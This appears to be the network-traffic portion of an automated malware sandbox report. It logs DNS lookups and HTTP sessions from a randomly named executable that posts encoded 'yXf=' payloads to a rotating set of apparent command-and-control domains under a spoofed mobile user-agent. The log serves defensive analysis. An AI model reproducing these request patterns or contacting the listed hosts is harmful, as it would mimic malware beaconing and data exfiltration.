                               Sep 11, 2024 14:25:47.733274937 CEST | 80 | 49714 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:47.733494997 CEST | 49714 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:47.736192942 CEST | 49714 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:47.741257906 CEST | 80 | 49714 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:53.003635883 CEST | 49715 | 80 | 192.168.2.11 | 66.81.203.10
                               Sep 11, 2024 14:25:53.008589029 CEST | 80 | 49715 | 66.81.203.10 | 192.168.2.11
                               Sep 11, 2024 14:25:53.008663893 CEST | 49715 | 80 | 192.168.2.11 | 66.81.203.10
                               Sep 11, 2024 14:25:53.020313978 CEST | 49715 | 80 | 192.168.2.11 | 66.81.203.10
                               Sep 11, 2024 14:25:53.025374889 CEST | 80 | 49715 | 66.81.203.10 | 192.168.2.11
                               Sep 11, 2024 14:25:53.594269991 CEST | 80 | 49715 | 66.81.203.10 | 192.168.2.11
                               Sep 11, 2024 14:25:53.594393015 CEST | 80 | 49715 | 66.81.203.10 | 192.168.2.11
                               Sep 11, 2024 14:25:53.594449043 CEST | 49715 | 80 | 192.168.2.11 | 66.81.203.10
                               Sep 11, 2024 14:25:54.522677898 CEST | 49715 | 80 | 192.168.2.11 | 66.81.203.10
                               Sep 11, 2024 14:25:55.541405916 CEST | 49716 | 80 | 192.168.2.11 | 66.81.203.10
                               Sep 11, 2024 14:25:55.547158003 CEST | 80 | 49716 | 66.81.203.10 | 192.168.2.11
                               Sep 11, 2024 14:25:55.547306061 CEST | 49716 | 80 | 192.168.2.11 | 66.81.203.10
                               Sep 11, 2024 14:25:55.558121920 CEST | 49716 | 80 | 192.168.2.11 | 66.81.203.10
                               Sep 11, 2024 14:25:55.563179970 CEST | 80 | 49716 | 66.81.203.10 | 192.168.2.11
                               Sep 11, 2024 14:25:56.138808012 CEST | 80 | 49716 | 66.81.203.10 | 192.168.2.11
                              Sep 11, 2024 14:25:56.139492035 CEST804971666.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:56.139554024 CEST4971680192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:57.069525003 CEST4971680192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:58.088223934 CEST4971780192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:58.093267918 CEST804971766.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:58.093369961 CEST4971780192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:58.105159044 CEST4971780192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:58.111227036 CEST804971766.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:58.111349106 CEST804971766.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:58.679058075 CEST804971766.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:58.725920916 CEST4971780192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:58.752980947 CEST804971766.81.203.10192.168.2.11
                              Sep 11, 2024 14:25:58.753163099 CEST4971780192.168.2.1166.81.203.10
                              Sep 11, 2024 14:25:59.616442919 CEST4971780192.168.2.1166.81.203.10
                              Sep 11, 2024 14:26:00.639983892 CEST4971880192.168.2.1166.81.203.10
                              Sep 11, 2024 14:26:00.645098925 CEST804971866.81.203.10192.168.2.11
                              Sep 11, 2024 14:26:00.645195007 CEST4971880192.168.2.1166.81.203.10
                              Sep 11, 2024 14:26:00.652930975 CEST4971880192.168.2.1166.81.203.10
                              Sep 11, 2024 14:26:00.658967018 CEST804971866.81.203.10192.168.2.11
                              Sep 11, 2024 14:26:01.474500895 CEST804971866.81.203.10192.168.2.11
                              Sep 11, 2024 14:26:01.474853039 CEST804971866.81.203.10192.168.2.11
                              Sep 11, 2024 14:26:01.474869013 CEST804971866.81.203.10192.168.2.11
                              Sep 11, 2024 14:26:01.474977016 CEST4971880192.168.2.1166.81.203.10
                              Sep 11, 2024 14:26:01.475014925 CEST4971880192.168.2.1166.81.203.10
                              Sep 11, 2024 14:26:01.478365898 CEST4971880192.168.2.1166.81.203.10
                              Sep 11, 2024 14:26:01.483742952 CEST804971866.81.203.10192.168.2.11
                              Sep 11, 2024 14:26:06.824872017 CEST4971980192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:06.829849005 CEST8049719103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:06.829969883 CEST4971980192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:06.846338987 CEST4971980192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:06.851202011 CEST8049719103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:07.700239897 CEST8049719103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:07.700473070 CEST8049719103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:07.700536966 CEST4971980192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:08.350718975 CEST4971980192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:09.370184898 CEST4972080192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:09.375288010 CEST8049720103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:09.375399113 CEST4972080192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:09.386543989 CEST4972080192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:09.391848087 CEST8049720103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:10.257302046 CEST8049720103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:10.257328033 CEST8049720103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:10.257388115 CEST4972080192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:10.897735119 CEST4972080192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:11.919754982 CEST4972180192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:11.924693108 CEST8049721103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:11.924776077 CEST4972180192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:11.942610979 CEST4972180192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:11.947701931 CEST8049721103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:11.947712898 CEST8049721103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:12.824970961 CEST8049721103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:12.824990988 CEST8049721103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:12.825438976 CEST4972180192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:13.460072041 CEST4972180192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:14.479084969 CEST4972280192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:14.484072924 CEST8049722103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:14.484252930 CEST4972280192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:14.491461039 CEST4972280192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:14.496285915 CEST8049722103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:15.364213943 CEST8049722103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:15.364584923 CEST8049722103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:15.364789009 CEST4972280192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:15.368304968 CEST4972280192.168.2.11103.42.108.46
                              Sep 11, 2024 14:26:15.373178005 CEST8049722103.42.108.46192.168.2.11
                              Sep 11, 2024 14:26:20.396421909 CEST4972380192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:20.401299000 CEST80497233.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:20.401369095 CEST4972380192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:20.414041996 CEST4972380192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:20.418888092 CEST80497233.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:20.868561029 CEST80497233.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:20.868957043 CEST4972380192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:21.928867102 CEST4972380192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:21.933727980 CEST80497233.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:22.956022024 CEST4972480192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:22.961759090 CEST80497243.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:22.961915016 CEST4972480192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:22.973388910 CEST4972480192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:22.978302002 CEST80497243.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:23.445012093 CEST80497243.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:23.445178986 CEST4972480192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:25.010390997 CEST4972480192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:25.015551090 CEST80497243.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:26.026165962 CEST4972580192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:26.031009912 CEST80497253.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:26.031410933 CEST4972580192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:26.043894053 CEST4972580192.168.2.113.33.130.190
                              Sep 11, 2024 14:26:26.048994064 CEST80497253.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:26.049026966 CEST80497253.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:26.520967960 CEST80497253.33.130.190192.168.2.11
                              Sep 11, 2024 14:26:26.521060944 CEST4972580192.168.2.113.33.130.190
                               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                               Sep 11, 2024 14:25:18.159162045 CEST | 192.168.2.11 | 1.1.1.1 | 0x1ad | Standard query (0) | www.linkbasic.net | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:25:23.182786942 CEST | 192.168.2.11 | 1.1.1.1 | 0xdb07 | Standard query (0) | www.chamadaslotgiris.net | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:25:38.729727983 CEST | 192.168.2.11 | 1.1.1.1 | 0xcaa5 | Standard query (0) | www.masteriocp.online | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:25:52.745178938 CEST | 192.168.2.11 | 1.1.1.1 | 0xd0cf | Standard query (0) | www.mediaplug.biz | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:26:06.495399952 CEST | 192.168.2.11 | 1.1.1.1 | 0x958b | Standard query (0) | www.independent200.org | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:26:20.385597944 CEST | 192.168.2.11 | 1.1.1.1 | 0x7d27 | Standard query (0) | www.tigre777gg.online | A (IP address) | IN (0x0001) | false
                               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                               Sep 11, 2024 14:25:18.168704987 CEST | 1.1.1.1 | 192.168.2.11 | 0x1ad | Name error (3) | www.linkbasic.net | none | none | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:25:23.200865030 CEST | 1.1.1.1 | 192.168.2.11 | 0xdb07 | No error (0) | www.chamadaslotgiris.net | chamadaslotgiris.net |  | CNAME (Canonical name) | IN (0x0001) | false
                               Sep 11, 2024 14:25:23.200865030 CEST | 1.1.1.1 | 192.168.2.11 | 0xdb07 | No error (0) | chamadaslotgiris.net |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:25:23.200865030 CEST | 1.1.1.1 | 192.168.2.11 | 0xdb07 | No error (0) | chamadaslotgiris.net |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:25:39.155663013 CEST | 1.1.1.1 | 192.168.2.11 | 0xcaa5 | No error (0) | www.masteriocp.online | dns.ladipage.com |  | CNAME (Canonical name) | IN (0x0001) | false
                               Sep 11, 2024 14:25:39.155663013 CEST | 1.1.1.1 | 192.168.2.11 | 0xcaa5 | No error (0) | dns.ladipage.com |  | 18.139.62.226 | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:25:39.155663013 CEST | 1.1.1.1 | 192.168.2.11 | 0xcaa5 | No error (0) | dns.ladipage.com |  | 13.228.81.39 | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:25:39.155663013 CEST | 1.1.1.1 | 192.168.2.11 | 0xcaa5 | No error (0) | dns.ladipage.com |  | 54.179.173.60 | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:25:53.001246929 CEST | 1.1.1.1 | 192.168.2.11 | 0xd0cf | No error (0) | www.mediaplug.biz |  | 66.81.203.10 | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:25:53.001246929 CEST | 1.1.1.1 | 192.168.2.11 | 0xd0cf | No error (0) | www.mediaplug.biz |  | 66.81.203.200 | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:25:53.001246929 CEST | 1.1.1.1 | 192.168.2.11 | 0xd0cf | No error (0) | www.mediaplug.biz |  | 66.81.203.135 | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:26:06.822206974 CEST | 1.1.1.1 | 192.168.2.11 | 0x958b | No error (0) | www.independent200.org |  | 103.42.108.46 | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:26:20.393862963 CEST | 1.1.1.1 | 192.168.2.11 | 0x7d27 | No error (0) | www.tigre777gg.online | tigre777gg.online |  | CNAME (Canonical name) | IN (0x0001) | false
                               Sep 11, 2024 14:26:20.393862963 CEST | 1.1.1.1 | 192.168.2.11 | 0x7d27 | No error (0) | tigre777gg.online |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                               Sep 11, 2024 14:26:20.393862963 CEST | 1.1.1.1 | 192.168.2.11 | 0x7d27 | No error (0) | tigre777gg.online |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                              • www.chamadaslotgiris.net
                              • www.masteriocp.online
                              • www.mediaplug.biz
                              • www.independent200.org
                              • www.tigre777gg.online
                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               0 | 192.168.2.11 | 49710 | 3.33.130.190 | 80 | 4884 | C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Sep 11, 2024 14:25:23.222680092 CEST | 515 | OUT | GET /gqyt/?yXf=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyyR5H80Th6YuXnGllCxy50CTDtPW+4zyR3Ik=&ndk=ctppWTth- HTTP/1.1
                              Host: www.chamadaslotgiris.net
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-US
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                               Sep 11, 2024 14:25:23.684370041 CEST | 393 | IN | HTTP/1.1 200 OK
                              Server: openresty
                              Date: Wed, 11 Sep 2024 12:25:23 GMT
                              Content-Type: text/html
                              Content-Length: 253
                              Connection: close
                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yXf=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyyR5H80Th6YuXnGllCxy50CTDtPW+4zyR3Ik=&ndk=ctppWTth-"}</script></head></html>


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               1 | 192.168.2.11 | 49711 | 18.139.62.226 | 80 | 4884 | C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Sep 11, 2024 14:25:39.174925089 CEST | 788 | OUT | POST /p5rq/ HTTP/1.1
                              Host: www.masteriocp.online
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 200
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.masteriocp.online
                              Referer: http://www.masteriocp.online/p5rq/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Ascii: yXf=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7vhYpht5+Z4+3vyP+2iohrQJbgGZai6+Sog==
                               Sep 11, 2024 14:25:40.404805899 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                              Server: openresty
                              Date: Wed, 11 Sep 2024 12:25:39 GMT
                              Content-Type: text/html
                              Content-Length: 166
                              Connection: close
                              Location: https://www.masteriocp.online/p5rq/
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
                               Sep 11, 2024 14:25:40.404974937 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                              Server: openresty
                              Date: Wed, 11 Sep 2024 12:25:39 GMT
                              Content-Type: text/html
                              Content-Length: 166
                              Connection: close
                              Location: https://www.masteriocp.online/p5rq/
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               2 | 192.168.2.11 | 49712 | 18.139.62.226 | 80 | 4884 | C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Sep 11, 2024 14:25:41.728666067 CEST | 808 | OUT | POST /p5rq/ HTTP/1.1
                              Host: www.masteriocp.online
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 220
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.masteriocp.online
                              Referer: http://www.masteriocp.online/p5rq/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Ascii: yXf=cwFSIiCmOGbNHT+mkSOaF3I2kLptpE5v8r2oHl3koHl3va8tiuuathJyggRHvrJozGmEMPWUTfNnxYa/dpc5UW0YQSF5Lvd+v8NkmHI3OEl2H6uTuZdquFSnmlFV/J+asZqdTtIkfvZ8a4Gn/qGBb8sP3M1HOl2g2xV+4vpcZ9aXjUekmBh2oDBZ0g4qrLbbznwRVA+Jq+2MycjQ/MhjTx0=
                               Sep 11, 2024 14:25:42.624095917 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                              Server: openresty
                              Date: Wed, 11 Sep 2024 12:25:42 GMT
                              Content-Type: text/html
                              Content-Length: 166
                              Connection: close
                              Location: https://www.masteriocp.online/p5rq/
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               3 | 192.168.2.11 | 49713 | 18.139.62.226 | 80 | 4884 | C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Sep 11, 2024 14:25:44.276164055 CEST | 1821 | OUT | POST /p5rq/ HTTP/1.1
                              Host: www.masteriocp.online
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 1232
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.masteriocp.online
                              Referer: http://www.masteriocp.online/p5rq/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Ascii: yXf=cwFSIiCmOGbNHT+mkSOaF3I2kLptpE5v8r2oHl3koHt3vsotwZaa/xJytARCvrI6zHO6MPLjTc1nz6i/Yco5DG0YPCF4EPdrv9h7mHY3OEl2H7eTntBqilSky1Fj7J+ysZzoTtE0f8R8aYWn9Y+BX8s3wM0COl6F2xJy4uN6Z7qX1wztighhySlogwkZmIify086DQL25O2u75KYtJ9YNXw3reAArt8Q5Xf+zG1nwHZCbRc425RAqbYtV6iczkh2LOVjubf7i1C8FMR4fH2VXDy34pCB+MahZux8lICmXcflD0C7xG47Sb8Bax5EPg9U9CocgSo3suyL0x9LBixVrcKhDygvCaenDMA9KMeJ5BcwQUfYZyvLt024o0t3a6gcAa9obooCynLLZnYwgkjSxk1ly0p2OBcWwCpRb4hhtdOuGLzUPZOEeDgNlR7H/CWc+BmL6DHXCr70hNo6j8v1pKHiVWgC+0H5G9X1GCiJi7V3LswsyXwyqG+JbgAS9j2a0Vq7sfU/QheYcRAG6f0rSETdOKkuPa8yCa34pR8cQJP3dlDq6/AADzbzg290Fnts/JW//1mDRIQ0f0ukgF6rAIR9DucGGXHxpMfqbcDSZLKVIdSCcE2K4Sm9Ib38IsHVokr8uL827l0Yd5UqadxXi82sCMi0dJ+AoieG6YPw8hLXpIdkwjmwSZFT+c/F1I1Fd6ReWn2qT6sXs2KY7DnKiyDdxutfA6xcKcnY89h8rLbzN2nxAoCyVdPYEtQsK2nFJc731568geh9kAalovWfeCIcYES6RxfWtaP/vzIn/JX207mrHOghb4krmLd89JD4ZGYCoeVy3n7USVXfT26azo8fingTRBJK/WHwBdjZRt1UG+cQrYbsvivFPiRCtxWZV544oBd+F9nDmMw4m7c0bFdrNT0K9sQbCngCEF7C8T1/gu0bNED6W56h+iAndljzGtJVHrtF9gvQ/242qDMpyJ4L9rxnAk6BSbQFj+oSQvAqP2oK [TRUNCATED]
                               Sep 11, 2024 14:25:45.179224014 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                              Server: openresty
                              Date: Wed, 11 Sep 2024 12:25:45 GMT
                              Content-Type: text/html
                              Content-Length: 166
                              Connection: close
                              Location: https://www.masteriocp.online/p5rq/
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               4 | 192.168.2.11 | 49714 | 18.139.62.226 | 80 | 4884 | C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Sep 11, 2024 14:25:46.821049929 CEST | 512 | OUT | GET /p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5XgIEfDpHSeJZt7k9yl5pOWpoKoGLmM15kwU= HTTP/1.1
                              Host: www.masteriocp.online
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-US
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Sep 11, 2024 14:25:47.733251095 CEST | 507 | IN | HTTP/1.1 301 Moved Permanently
                              Server: openresty
                              Date: Wed, 11 Sep 2024 12:25:47 GMT
                              Content-Type: text/html
                              Content-Length: 166
                              Connection: close
                              Location: https://www.masteriocp.online/p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5XgIEfDpHSeJZt7k9yl5pOWpoKoGLmM15kwU=
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              5 | 192.168.2.11 | 49715 | 66.81.203.10 | 80 | 4884 | C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 11, 2024 14:25:53.020313978 CEST | 776 | OUT | POST /osde/ HTTP/1.1
                              Host: www.mediaplug.biz
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 200
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.mediaplug.biz
                              Referer: http://www.mediaplug.biz/osde/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 73 72 49 58 4a 63 53 63 6b 68 56 48 75 4f 74 6e 34 44 77 38 33 36 4f 79 4a 38 70 5a 6e 39 65 57 7a 70 54 2f 65 35 41 39 78 6e 46 30 50 56 66 56 51 47 62 39 45 45 6c 49 50 66 6c 5a 5a 48 68 63 7a 34 4c 4c 35 63 70 62 49 47 47 63 45 69 6a 37 6b 41 46 46 52 49 55 32 76 43 33 48 77 6b 42 43 6d 38 72 6d 34 48 76 47 37 4e 2f 51 30 61 4d 68 67 38 62 30 72 6b 58 63 66 41 43 41 78 6c 61 4d 72 32 64 63 7a 54 5a 4b 37 72 46 47 64 6c 38 4f 51 35 66 6a 50 56 61 61 72 35 4b 4f 65 57 4a 2f 41 36 76 6f 56 62 57 38 66 73 6a 51 4c 42 32 2f 64 30 56 61 4b 51 3d 3d
                              Data Ascii: yXf=cUZt2z1pvMaysrIXJcSckhVHuOtn4Dw836OyJ8pZn9eWzpT/e5A9xnF0PVfVQGb9EElIPflZZHhcz4LL5cpbIGGcEij7kAFFRIU2vC3HwkBCm8rm4HvG7N/Q0aMhg8b0rkXcfACAxlaMr2dczTZK7rFGdl8OQ5fjPVaar5KOeWJ/A6voVbW8fsjQLB2/d0VaKQ==
                              Sep 11, 2024 14:25:53.594269991 CEST | 727 | IN | HTTP/1.1 405 Not Allowed
                              Server: nginx/1.14.2
                              Date: Wed, 11 Sep 2024 12:25:53 GMT
                              Content-Type: text/html
                              Content-Length: 575
                              Connection: close
